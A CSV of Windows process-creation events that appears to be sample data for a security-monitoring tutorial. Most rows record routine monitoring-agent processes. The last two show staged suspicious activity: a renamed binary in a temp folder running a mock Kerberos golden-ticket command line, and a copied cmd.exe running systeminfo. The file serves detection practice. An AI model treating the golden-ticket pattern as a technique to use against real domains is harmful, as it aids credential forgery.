Path: blob/master/tutorials-and-examples/feature-tutorials/data/processes_on_host.csv
,TenantId,Account,EventID,TimeGenerated,Computer,SubjectUserSid,SubjectUserName,SubjectDomainName,SubjectLogonId,NewProcessId,NewProcessName,TokenElevationType,ProcessId,CommandLine,ParentProcessName,TargetLogonId,SourceComputerId,TimeCreatedUtc
0,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:24:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1610,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:24:24.010
1,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:24:24.023,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1790,C:\Windows\System32\conhost.exe,%%1936,0x1610,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:24:24.023
2,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:24:25.807,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xcd8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:24:25.807
3,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:24:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x28c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:24:26.010
4,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:07:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1284,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:07:26.003
5,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:08:24.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb10,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:08:24.013
6,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:08:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x2a8,C:\Windows\System32\conhost.exe,%%1936,0xb10,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:08:24.030
7,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:08:25.717,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x90c,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:08:25.717
8,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:08:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x130c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:08:26.007
9,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:09:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc84,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:09:26.010
10,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:10:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x570,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:10:24.000
11,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:10:24.047,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x28c,C:\Windows\System32\conhost.exe,%%1936,0x570,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:10:24.047
12,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:10:25.653,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:10:25.653
13,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:10:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd14,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:10:26.000
14,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:20:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1490,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:20:24.000
15,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:20:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x148c,C:\Windows\System32\conhost.exe,%%1936,0x1490,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:20:24.017
16,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:20:25.337,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1414,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:20:25.337
17,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:20:26.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1530,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:20:26.017
18,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:21:26.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x7b4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:21:26.003
19,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:17:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1594,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:17:26.000
20,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:18:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1630,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:18:24.010
21,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:18:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x16a0,C:\Windows\System32\conhost.exe,%%1936,0x1630,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:18:24.027
22,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:18:25.407,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1694,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:18:25.407
23,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:18:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1658,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:18:26.010
24,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:19:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1740,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:19:26.000
25,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:47:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd14,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:47:26.000
26,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:48:24.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1094,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:48:24.013
27,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:48:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1270,C:\Windows\System32\conhost.exe,%%1936,0x1094,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:48:24.030
28,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:48:25.743,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc10,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:48:25.743
29,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:48:26.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6ec,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:48:26.017
30,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:39:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1388,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:39:26.000
31,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:40:24.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc08,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:40:24.013
32,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:40:24.027,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x364,C:\Windows\System32\conhost.exe,%%1936,0xc08,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:40:24.027
33,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:40:25.393,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1338,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:40:25.393
34,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:40:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x12fc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:40:26.000
35,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:37:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1128,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:37:26.007
36,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:38:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13fc,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:38:24.000
37,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:38:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x123c,C:\Windows\System32\conhost.exe,%%1936,0x13fc,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:38:24.020
38,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:38:25.453,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13e8,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:38:25.453
39,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:38:26.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6bc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:38:26.017
40,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:17:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1254,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:17:26.000
41,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:18:24.003,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11b0,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:18:24.003
42,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:18:24.020,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1d0,C:\Windows\System32\conhost.exe,%%1936,0x11b0,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:18:24.020
43,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:18:25.490,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1070,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:18:25.490
44,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:18:26.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6ec,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:18:26.010
45,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:13:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc84,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:13:26.007
46,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.167,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x16fc,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,.\reg not /domain:everything that /sid:shines is /krbtgt:golden !,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.167
47,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:16.277,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1700,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd /c ""systeminfo && systeminfo""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:16.277
